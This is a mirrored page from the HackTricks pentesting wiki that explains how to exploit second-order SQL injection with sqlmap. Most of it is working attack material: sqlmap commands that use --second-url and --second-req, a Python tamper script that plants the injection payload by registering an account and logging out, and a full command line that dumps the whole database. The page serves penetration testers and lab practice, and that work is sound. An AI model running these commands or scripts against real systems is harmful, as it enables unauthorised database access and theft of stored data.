Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-15 17:28:13 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/pentesting-web/sql-injection/sqlmap/second-order-injection-sqlmap.md
CPol 2dfc984ab3
GitBook: [master] 352 pages modified
2020-07-22 19:36:23 +00:00

3.2 KiB
Raw Blame History

Second Order Injection - SQLMap

SQLMap can exploit Second Order SQLis.
You need to provide:

  • The request where the sqlinjection payload is going to be saved
  • The request where it can find the output of this injection

The request where the SQL injection payload is saved is indicated as in any other injection in sqlmap. The request where sqlmap can read the output of the injection can be indicated with --second-url or with --second-req if you need to indicate a complete request.

Simple second order example:

#Get the outout with a GET to a url
sqlmap -r login.txt -p username --second-url "http://10.10.10.10/details.php"

#Get the ouput sending a custom request from a file
sqlmap -r login.txt -p username --second-req details.txt

In several cases this won't be enough because you will need to perform other actions apart from sending the payload and read a different page.

When this is needed you can user a sqlmap tamper. For example the following script will logout, register and login using a cookie.

#!/usr/bin/env python

import re
import requests
from lib.core.enums import PRIORITY
__priority__ = PRIORITY.NORMAL

def dependencies():
    pass

def login_account(payload):
    proxies = {'http':'http://127.0.0.1:8080'}
    cookies = {"PHPSESSID": "6laafab1f6om5rqjsbvhmq9mf2"}

    params = {"username":"asdasdasd", "email":payload, "password":"11111111"}
    url = "http://10.10.10.10/create.php"
    pr = requests.post(url, data=params, cookies=cookies, verify=False, allow_redirects=True, proxies=proxies)

    url = "http://10.10.10.10/exit.php"
    pr = requests.get(url, cookies=cookies, verify=False, allow_redirects=True, proxies=proxies)

def tamper(payload, **kwargs):
    headers = kwargs.get("headers", {})
    login_account(payload)
    return payload

A SQLMap tamper is always executed before starting a injection with a payload and it has to return a payload. In this case we don't care about the payload but we care about sending some requests, so the payload isn't changed.

So, if for some reason we need a more complex flow to exploit the second order SQLinjection like:

  • Create an account with the SQLi payload inside the "email" field
  • Logout
  • Login with that account
  • Send a request to execute the SQL injection

This sqlmap line will help:

sqlmap --tamper tamper.py -r login.txt -p email --second-req second.txt --proxy http://127.0.0.1:8080 --prefix "a2344r3F'" --technique=U --dbms mysql --union-char "DTEC" -a
###########
# --tamper tamper.py : Indicates the tamper to execute before trying each SQLipayload
# -r login.txt : Indicates the request to send the SQLi payload
# -p email : Focus on email parameter (you can do this with an "email=*" inside login.txt
# --second-req second.txt : Request to send to execute the SQLi and get the ouput
# --proxy http://127.0.0.1:8080 : Use this proxy
# --technique=U : Help sqlmap indicating the technique to use
# --dbms mysql : Help sqlmap indicating the dbms
# --prefix "a2344r3F'" : Help sqlmap detecting the injection indicating the prefix
# --union-char "DTEC" : Help sqlmap indicating a different union-char so it can identify the vuln
# -a : Dump all